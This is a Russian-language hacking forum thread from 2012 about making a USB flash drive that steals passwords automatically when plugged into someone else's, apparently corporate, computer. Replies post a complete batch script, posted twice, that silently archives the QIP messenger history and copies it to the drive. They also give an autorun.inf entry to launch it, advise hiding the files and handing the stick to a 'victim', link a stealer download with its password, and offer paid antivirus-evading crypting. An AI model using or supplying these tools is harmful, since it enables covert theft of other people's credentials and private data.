Просмотр полной версии : Как украсть все пароли, вставив флешку, ничего не делая?
McProFile
19.03.2012, 01:00
Добрый день уважаемые форумчане!
У меня вот такая проблема : нужно вставить флешку в USB порт, автоматически украдет все пароли. Когда захожу на любую страницу, он блокируе, т.к. комп корпоративный
Можно программу, скриптдля флешки, батник, ну что нибудь!
За нахождение программы пополняю репу!
Буду благодарен!
_Werewolf_
19.03.2012, 01:00
Цитата:
Сообщение от McProFile
Везде вижу что даже не активированные юзеры пишут - "пополню репу" и т.п. На этом сайте пополнить репутацию можно только если у тебя не меньше 50 репа.
А по теме - залить стилер на флешку и поставить его на запуск при подключению к компу, т.е. Autorun.inf.
мм... мне бы тоже было это интересно))
gogil-mogil
21.03.2012, 01:00
Цитата:
Сообщение от _Werewolf_
и поставить его на запуск при подключению к компу, т.е. Autorun.inf.
Поподробней можно?
_Werewolf_
21.03.2012, 01:00
Цитата:
Сообщение от gogil-mogil
Поподробней можно?
Можно. Создаешь на флешке файл Autorun.inf и прописываешь запуск файла (т.е. трояна, стилера или чего-ещё). Сведения как прописать можно найти в инете. Вот (https://hpc.name/redirector.html#http://ru.wikipedia.org/wiki/Autorun.inf) ссылка с Википедии, где написаны все нужные команды для запуска. Хотя есть конечно некоторые нюансы, типа "запрещен автозапуск" и подобное. Как это обойти - это другой вопрос (если можно обойти. я не интересовался особо этим вопросом, поэтому не знаю).
Rastamancik
22.03.2012, 01:00
Цитата:
Сообщение от McProFile
У меня вот такая проблема : нужно вставить флешку в USB порт, автоматически украдет все пароли. Когда захожу на любую страницу, он блокируе, т.к. комп корпоративный
Буду благодарен!
Флеш граббер слышал а таком а нашёт реппы то удачи тебе меня ешё даже не активировали а ты хочеш штоб ты с репутацыей навичиок повысить реп))))(смешно)
_Werewolf_
22.03.2012, 01:00
Цитата:
Сообщение от Rastamancik
Флеш граббер
Так эта прога ворует с флешки, а не на неё. И пиши правильней. Не каждое слово с словарем проверяй, но элементарную орфографию соблюдать можно.
Позавчера уже публиковал это!!!!! Будьте внимательней пользуйтесь поиском!!!!
Для написания батника возьмём стандартный блокнот. В блокноте пропишем следующие строки:
@Echo off
c:
chdir C:\Program Files\QIP\Users
f:\rar.exe a -r users -r > nul
сopy users.rar g:\adc > nul
del users.rar > nul
где
©Echo off - скрывает визуальный процесс копирования.
C:\Program Files\QIP\Users - папка, в которой находится история.
f:\rar.exe а -г users > nul -запуск архиватора для ускорения копирования.
copy users.rar g:\adc > nul - адрес куда копируем.
del users.rar > nul - удаляет созданный архив на жеском диске.
Не всегда бывает известна буква флеш-диска. В "таком случае прописываем несколько вариантов (один уж точно угадаем):
@Echo off
с:
chdit C:\Program Files\QIP\Users
f:\rar.exe а -г users > nul
copy users.rar e:\abc > nul
g:\rar.exe a -r users > nul
copy users.rar g:\abc > nul
h:\rar.exe a -r users > nul
copy users.rar h:\abc > nul
del users-rar > nul
Сохраняем наш текстовый документ. Назовём его xxx.txt. И меняем расширение c .txt нa .bat.
Создаем автозапуск
Теперь надо сделать так, чтобы батник автоматически запускался с флешки при подключении к компьютеру. Для этого создаём новый текстовый документ и пишем в нём:
[autorun]
ShellExeCute="xxx.bat"
Сохраняем файл и переименовываем его на autorun.inf.
Делаем архив
Далее нам предстоит позаботится об архиваторе. QIP-история может быть большая. Чтобы процесс копирования происходил быстрее мы её заархивируем.
Из папки с WinRAR (по умолчанию C:\Program Files\WinRAR берём файлик rar.exe. Создаём в корне флешки папку с именем abc. Также, в корень флешки бросаем остальные три файла (xxx.bat, autorun.inf, rar.exe).
Все файлы скрываем от посторонних глаз (правой кнопкой мыши вызываем Меню на файле > Свойства > Скрытый. Это всё. Отдаём флешку "жертве" и ждём результата.
добрый день, Я сделал все по твоей инструкции! но вот проблема, как проверить работает это или нет? пароли появятся где?
anton68518
16.04.2012, 01:00
Zakarte После выполнения батника у тебя на флешке будет архив users.rar (там будут все данные).
Botbad А как сделать чтобы архив тоже был скрытый на флешке после копирования.
anton68518
а архив будет в папке abc?
Цитата:
Сообщение от McProFile
Буду благодарен!
телефон,флэшка,для этого стиллер подойдет
форум цак (https://hpc.name/redirector.html#https://vazonez.com/forum/index.php?topic=3.0)
Hide:
Чтобы просмотреть данный текст, авторизуйтесь на форуме.
UFR Stiller v2.6.0 скоро обновление (https://hpc.name/redirector.html#http://vazonez.com/downloads/software/UFR_Stealer_5bc75ffc14f19b899cbf190b2b125f4b6a0204 f4.rar)
Можно купить за 300$ специальный аппарат наподобие разъема для мышки втыкаеш в зад компа антивирус не палит и за 2 сек устанавливается Клавиатурный шпион или оставить там и он всё записывает.Потом приходишь и забираешь как тебе удобно.
Pricool007
16.04.2012, 01:00
А как сделать чтобы например на флешку сохранились сохранённые пароли из vk?
Botbad,
y всех история хранится здесь? у меня например или в другом месте или скрыта
makar9463
01.05.2012, 01:00
Стилер лепи,криптуй его чтоб антивирусы не палили, и на флешку в автозапуск. Много от чего пароли находит. Если надо закриптовать пиши в личку)
FlashKhb
08.05.2012, 01:00
Цитата:
Сообщение от makar9463
Стилер лепи,криптуй его чтоб антивирусы не палили, и на флешку в автозапуск. Много от чего пароли находит. Если надо закриптовать пиши в личку)
сам сделаешь?
INVISIBL
08.05.2012, 01:00
>>Botbad
подберать "букву флешки" в батнике немного идиотизм, а если там стоят еще какие флешки ? или если там юсб модем ? то выдаст целую гору ошибок...
и да любой АВ сейчас ругается на файл авторан.инф
сам недавно сталкнулся с такой же ситуацией когда нужно было слить инфу на флешку, вспомнил про такую старую заразу как RECYCLER, по её типу написал свою, если интересно пиши 99e1a003a94f83067b340ea64064f13a [md5]
Цитата:
Сообщение от Botbad
Позавчера уже публиковал это!!!!! Будьте внимательней пользуйтесь поиском!!!!
Для написания батника возьмём стандартный блокнот. В блокноте пропишем следующие строки:
@Echo off
c:
chdir C:\Program Files\QIP\Users
f:\rar.exe a -r users -r > nul
сopy users.rar g:\adc > nul
del users.rar > nul
где
©Echo off - скрывает визуальный процесс копирования.
f:\rar.exe а -г users > nul -запуск архиватора для ускорения копирования.
copy users.rar g:\adc > nul - адрес куда копируем.
del users.rar > nul - удаляет созданный архив на жеском диске.
Не всегда бывает известна буква флеш-диска. В "таком случае прописываем несколько вариантов (один уж точно угадаем):
@Echo off
с:
chdit C:\Program Files\QIP\Users
f:\rar.exe а -г users > nul
copy users.rar e:\abc > nul
g:\rar.exe a -r users > nul
copy users.rar g:\abc > nul
h:\rar.exe a -r users > nul
copy users.rar h:\abc > nul
del users-rar > nul
Сохраняем наш текстовый документ. Назовём его xxx.txt. И меняем расширение c .txt нa .bat.
Создаем автозапуск
Теперь надо сделать так, чтобы батник автоматически запускался с флешки при подключении к компьютеру. Для этого создаём новый текстовый документ и пишем в нём:
[autorun]
ShellExeCute="xxx.bat"
Сохраняем файл и переименовываем его на autorun.inf.
Делаем архив
Далее нам предстоит позаботится об архиваторе. QIP-история может быть большая. Чтобы процесс копирования происходил быстрее мы её заархивируем.
Из папки с WinRAR (по умолчанию C:\Program Files\WinRAR берём файлик rar.exe. Создаём в корне флешки папку с именем abc. Также, в корень флешки бросаем остальные три файла (xxx.bat, autorun.inf, rar.exe).
Все файлы скрываем от посторонних глаз (правой кнопкой мыши вызываем Меню на файле > Свойства > Скрытый. Это всё. Отдаём флешку "жертве" и ждём результата.
скопируется все что есть в папке по адресу "C:\Program Files\QIP\Users "?? чето неполучается уменя у самого себя украсть фаыйл ( ) все вроде правельно, буквы проверели (ну и изменил для себя) но чето неполучается(
drmorgan
02.06.2012, 01:00
Народ насколько я припоминаю, где то год назад. или мож чуть больше эта тема уже подымалась и прога там соответствуящяя была , работала прекрасно, во всяком слусае воровала пароли со всех браузеров кроме хрома, достаточно было втавить флеху в комп, называлась тема "Угон паролей на флешку", фоспользуйтесь поиском по сайту.
diskonet
17.06.2012, 01:00
Цитата:
Сообщение от Honest2
скопируется все что есть в папке по адресу "C:\Program Files\QIP\Users "?? чето неполучается уменя у самого себя украсть фаыйл ( ) все вроде правельно, буквы проверели (ну и изменил для себя) но чето неполучается(
такая же проблема!! может кто подскажет её ришение??
@HackerNovice@
17.06.2012, 01:00
Всё достаточно просто.
Для начала нам нужен "Стиллер"
Скачать его можно нажав сюда (https://hpc.name/redirector.html#http://www.vazonez.com/page/ufr).
Пароль: vazonez
После чего настраиваем программу.
( Обучу настройке и криптовке стиллера - 70 р. ) (не сочтите за рекламу )
Криптуем её, чтобы не спалилась антивирусными программами.
Далее, нам понадобится флешка.
О том как сделать так, чтобы при вставке USB-флешки запусказлась определенная программа, в нашем случаи "Стиллер", можете прочитать здесь (http://hpc.name/thread/38644/p1.html). Данная статья практически похожа, но в статье делают флешку убийцу, а мы делаем флешку-вора
Желаю удачи
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot